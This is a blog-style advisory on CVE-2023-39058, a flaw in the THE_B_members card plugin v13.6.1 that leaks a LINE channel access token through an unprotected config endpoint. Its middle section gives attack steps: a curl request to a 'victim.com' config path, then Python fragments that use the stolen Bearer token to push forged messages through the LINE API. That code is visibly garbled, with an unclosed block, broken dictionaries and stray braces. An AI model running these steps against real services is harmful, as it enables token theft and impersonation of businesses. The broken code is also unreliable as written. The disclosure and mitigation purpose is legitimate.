CVE-2023-39058 - Information Leak in THE_B_members Card v13.6.1 Exposes Channel Access Token

---

Recently, a vulnerability known as CVE-2023-39058 was discovered in THE_B_members card version 13.6.1. This issue allows attackers to extract the channel access token and send crafted messages by exploiting an exposed API endpoint. In this post, we’ll break down the vulnerability, show you how it works with a code snippet, and share resources for further reading.

What Is THE_B_members card?

THE_B_members card is a membership management and rewards plugin often used by businesses to handle loyalty cards and digital member services. It’s widely adopted in several regional markets due to its ease of use and integration with popular chat/messaging platforms.

What’s the CVE-2023-39058 Vulnerability?

The flaw appears in the way version 13.6.1 manages access credentials, particularly the *channel access token*—a sensitive string that should be kept private because it allows anyone to interact with the backend as if they were an admin or service account.

Impact: Unauthorized retrieval of the channel access token

- Result: Attackers can send forged/crafted messages on behalf of the business through integrated platforms (like LINE or similar messaging APIs).

How the Leak Happens

In a misconfigured or default install (which is common), a particular endpoint serves configuration details without proper access controls. By simply sending a GET request to the right URL, an attacker can access sensitive information.

Vulnerable Endpoint Example

GET /plugins/THE_B_members/config

*(Replace with the correct path if your configuration differs.)*

The response contains details like

{
  "channel_id": "164xxx578",
  "channel_access_token": "4yA8ZxxxYO3waNXXXXVTkrB12JpUFv86vbe...",
  "provider": "theb_platform"
}

`bash

curl http://victim.com/plugins/THE_B_members/config

import requests

"Authorization": f"Bearer {TOKEN}",

"Content-Type": "application/json"
}

]

}
resp = requests.post("https://api.line.me/v2/bot/message/push", headers=headers, json=payload)

Upgrade to the latest patched version as soon as one is available.

- Block public access to any /config or related admin endpoints.

References

- NVD Entry for CVE-2023-39058
- THE_B_members card official site *(Japanese)*
- About LINE channel access tokens

Summary

CVE-2023-39058 is a critical information leak in THE_B_members card plugin v13.6.1 that lets attackers easily steal your channel access token and impersonate your business in chat messages. Don’t wait—check your installation, block the vulnerable endpoint, and update your software immediately. If you’re unsure whether you’re exposed, follow the exploit steps above to see if you can retrieve your own token.

Timeline

Published on: 09/18/2023 21:15:55 UTC
Last modified on: 09/21/2023 19:33:37 UTC